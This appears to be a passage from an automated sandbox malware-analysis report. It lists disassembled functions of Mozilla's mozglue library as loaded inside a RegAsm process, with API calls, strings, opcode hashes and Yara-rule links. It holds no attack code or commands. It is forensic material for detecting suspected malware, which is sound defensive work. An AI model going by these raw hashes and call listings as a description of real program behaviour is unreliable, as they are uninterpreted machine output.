                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                        • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                        • API String ID: 1980384892-344433685
                                                                                                                                                        • Opcode ID: 2dcf98c13e469516bf31d69b6493439dd91443d009e24c5f2702b26fe6f81a18
                                                                                                                                                        • Instruction ID: bfb5cd0941028071212fd61ce6d0c75a452f36673f2e28f4837e7d53be14b7ce
                                                                                                                                                        • Opcode Fuzzy Hash: 2dcf98c13e469516bf31d69b6493439dd91443d009e24c5f2702b26fe6f81a18
                                                                                                                                                        • Instruction Fuzzy Hash: 0651F571E052289BDB14DF68CA407EEB7F0EF5A318F04882DD89577780E7306949C7AA
                                                                                                                                                        Function 6C67A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C67A565
                                                                                                                                                          • Part of subcall function 6C67A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C67A4BE
                                                                                                                                                          • Part of subcall function 6C67A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C67A4D6
                                                                                                                                                        • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C67A65B
                                                                                                                                                        • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C67A6B6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                        • String ID: 0$z
                                                                                                                                                        • API String ID: 310210123-2584888582
                                                                                                                                                        • Opcode ID: aa022d81d9a142cce82832540612c4a2d638214d9c8ddcfc41afbb70907380f7
                                                                                                                                                        • Instruction ID: 7cd33347e41d5b401ff1ebf8b09b0ef2e2c249273b1b418889aed0f8aadb0587
                                                                                                                                                        • Opcode Fuzzy Hash: aa022d81d9a142cce82832540612c4a2d638214d9c8ddcfc41afbb70907380f7
                                                                                                                                                        • Instruction Fuzzy Hash: 31415971A097459FC351CF28C080A8BBBE4BFCA344F409A2EF4998B651EB30D549CB97
                                                                                                                                                        Function 6C649420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C63AB89: EnterCriticalSection.KERNEL32(6C68E370,?,?,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284), ref: 6C63AB94
                                                                                                                                                          • Part of subcall function 6C63AB89: LeaveCriticalSection.KERNEL32(6C68E370,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63ABD1
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        Strings
                                                                                                                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C649459
                                                                                                                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C64947D
                                                                                                                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C64946B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                        • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                        • API String ID: 4042361484-1628757462
                                                                                                                                                        • Opcode ID: b2b55356f1252e688ba93f63ee678541217602c89bb1e8f345443dad24158b6f
                                                                                                                                                        • Instruction ID: 9244b932b20999f6846134a1706514a7a6f73b0f001d229b69f4005450a80183
                                                                                                                                                        • Opcode Fuzzy Hash: b2b55356f1252e688ba93f63ee678541217602c89bb1e8f345443dad24158b6f
                                                                                                                                                        • Instruction Fuzzy Hash: 7B01D870A02101A7DB009B6EDA51A8933799F4B36CF148537D90BC6B42D632D865897F
                                                                                                                                                        Function 6C60B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(?,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B6AC
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B6D1
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B6E3
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B70B
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B71D
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C60B61E), ref: 6C60B73F
                                                                                                                                                        • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B760
                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B79A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1394714614-0
                                                                                                                                                        • Opcode ID: b7e33c066784a7a50a7d0d3304996afdf1866d18f7c53e5e67e9e47b9c1b6deb
                                                                                                                                                        • Instruction ID: 7034dea0afbbf142a1ecfc8e7d100f74241234bb96f332762f2b202165339eb0
                                                                                                                                                        • Opcode Fuzzy Hash: b7e33c066784a7a50a7d0d3304996afdf1866d18f7c53e5e67e9e47b9c1b6deb
                                                                                                                                                        • Instruction Fuzzy Hash: B441E4B2E001159FCB14DF68DD806AEB7B5FF85324F254629E825F7780E731A90087E9
                                                                                                                                                        Function 6C67B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C67B5B9
                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C67B5C5
                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C67B5DA
                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C67B5F4
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C67B605
                                                                                                                                                        • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C67B61F
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6C67B631
                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C67B655
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1276798925-0
                                                                                                                                                        • Opcode ID: a0c47448ddceed92c698e3d50cbaf79e866052a07a10b8a9dbe7c2c9baef63d7
                                                                                                                                                        • Instruction ID: 608238bc4642f334cd1cc372f85910d99a9708cbbf257ef18346c27490a28886
                                                                                                                                                        • Opcode Fuzzy Hash: a0c47448ddceed92c698e3d50cbaf79e866052a07a10b8a9dbe7c2c9baef63d7
                                                                                                                                                        • Instruction Fuzzy Hash: 54317275B01115ABCB109F6AC8949AEB7F5EBCB324F140915DA0697741DB30A806CFBE
                                                                                                                                                        Function 6C646590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C63FA80: GetCurrentThreadId.KERNEL32 ref: 6C63FA8D
                                                                                                                                                          • Part of subcall function 6C63FA80: AcquireSRWLockExclusive.KERNEL32(6C68F448), ref: 6C63FA99
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C646727
                                                                                                                                                        • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C6467C8
                                                                                                                                                          • Part of subcall function 6C654290: memcpy.VCRUNTIME140(?,?,6C662003,6C660AD9,?,6C660AD9,00000000,?,6C660AD9,?,00000004,?,6C661A62,?,6C662003,?), ref: 6C6542C4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                        • String ID: data$vhl
                                                                                                                                                        • API String ID: 511789754-3148178927
                                                                                                                                                        • Opcode ID: d31a9f04248f7ea05369b6513cd80d6e1a0f2e49c1450c3e45ea9792ea8ed1b9
                                                                                                                                                        • Instruction ID: 7365bd2de2efb8e4df808bb591c1501763efa2b85c6cf1cd64bcf18a17470158
                                                                                                                                                        • Opcode Fuzzy Hash: d31a9f04248f7ea05369b6513cd80d6e1a0f2e49c1450c3e45ea9792ea8ed1b9
                                                                                                                                                        • Instruction Fuzzy Hash: 41D1CF75A093409FD724CF25C841B9EB7F5AFC6308F10892DE58987B91DB70E849CB6A
                                                                                                                                                        Function 6C63D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C60EB57,?,?,?,?,?,?,?,?,?), ref: 6C63D652
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C60EB57,?), ref: 6C63D660
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C60EB57,?), ref: 6C63D673
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C63D888
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$memsetmoz_xmalloc
                                                                                                                                                        • String ID: W`l$|Enabled
                                                                                                                                                        • API String ID: 4142949111-1284899109
                                                                                                                                                        • Opcode ID: 520b344ef630b270d03548fffe450aa15c9a9ea0bfcc4398daec8096d1fae41e
                                                                                                                                                        • Instruction ID: d8a93e9b097fa96d6ed39dea4d3bb09b293ef142051ffbc287a598767437aab3
                                                                                                                                                        • Opcode Fuzzy Hash: 520b344ef630b270d03548fffe450aa15c9a9ea0bfcc4398daec8096d1fae41e
                                                                                                                                                        • Instruction Fuzzy Hash: D2A126B0A053249FDB11CF69C4D07EEBBF1AF4A318F14A05CD899AB741C731A945CBA9
                                                                                                                                                        Function 6C651D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C651D0F
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,6C651BE3,?,?,6C651D96,00000000), ref: 6C651D18
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,6C651BE3,?,?,6C651D96,00000000), ref: 6C651D4C
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C651DB7
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C651DC0
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C651DDA
                                                                                                                                                          • Part of subcall function 6C651EF0: GetCurrentThreadId.KERNEL32 ref: 6C651F03
                                                                                                                                                          • Part of subcall function 6C651EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C651DF2,00000000,00000000), ref: 6C651F0C
                                                                                                                                                          • Part of subcall function 6C651EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C651F20
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C651DF4
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1880959753-0
                                                                                                                                                        • Opcode ID: 9307afd0ed04c79aa529f0ce570ac73364e506261f6197d936dbd82eb0b1f93a
                                                                                                                                                        • Instruction ID: b43357ad5094494e87d55af489729dc3047ded0bdbf9db5adff46350d4f92147
                                                                                                                                                        • Opcode Fuzzy Hash: 9307afd0ed04c79aa529f0ce570ac73364e506261f6197d936dbd82eb0b1f93a
                                                                                                                                                        • Instruction Fuzzy Hash: EF418CB5201701AFCB10CF29C888A56BBF5FF8A314F50452DE95A87B41CB71F864CBA9
                                                                                                                                                        Function 6C6484E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6484F3
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C64850A
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C64851E
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C64855B
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C64856F
                                                                                                                                                        • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6485AC
                                                                                                                                                          • Part of subcall function 6C647670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6485B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C64767F
                                                                                                                                                          • Part of subcall function 6C647670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6485B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C647693
                                                                                                                                                          • Part of subcall function 6C647670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6485B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6476A7
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6485B2
                                                                                                                                                          • Part of subcall function 6C625E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C625EDB
                                                                                                                                                          • Part of subcall function 6C625E90: memset.VCRUNTIME140(ewfl,000000E5,?), ref: 6C625F27
                                                                                                                                                          • Part of subcall function 6C625E90: LeaveCriticalSection.KERNEL32(?), ref: 6C625FB2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2666944752-0
                                                                                                                                                        • Opcode ID: fa908498558acf4e6282fec861ee9a915c75e68931382965f038b2e958616856
                                                                                                                                                        • Instruction ID: c7f1e369637b919471c09d40f96cad87de6c4b5625449b097e1ad095d9cd615a
                                                                                                                                                        • Opcode Fuzzy Hash: fa908498558acf4e6282fec861ee9a915c75e68931382965f038b2e958616856
                                                                                                                                                        • Instruction Fuzzy Hash: F221D3702016019FDB18DF25D888A5A77B5AF8930CF14892DE54BC3B41DB31F958CB99
                                                                                                                                                        Function 6C611640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C611699
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6116CB
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6116D7
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6116DE
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6116E5
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6116EC
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6116F9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 375572348-0
                                                                                                                                                        • Opcode ID: 11cbabc1ec345ad55dc610c174cf3957bc8bbd95d9adc1c687dbec9aa90c88b6
                                                                                                                                                        • Instruction ID: e7862b3943bc99f6abbfde1fb144caf80d9ec5239f32675b020f39fcf6c08313
                                                                                                                                                        • Opcode Fuzzy Hash: 11cbabc1ec345ad55dc610c174cf3957bc8bbd95d9adc1c687dbec9aa90c88b6
                                                                                                                                                        • Instruction Fuzzy Hash: C621D2B07442087BFB116A698C85FFB737CEFD6704F004528F6059B680C6759D5486B9
                                                                                                                                                        Function 6C64F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C63CBE8: GetCurrentProcess.KERNEL32(?,6C6031A7), ref: 6C63CBF1
                                                                                                                                                          • Part of subcall function 6C63CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6031A7), ref: 6C63CBFA
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F619
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C64F598), ref: 6C64F621
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F637
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8,?,?,00000000,?,6C64F598), ref: 6C64F645
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8,?,?,00000000,?,6C64F598), ref: 6C64F663
                                                                                                                                                        Strings
                                                                                                                                                        • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C64F62A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                        • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                        • API String ID: 1579816589-753366533
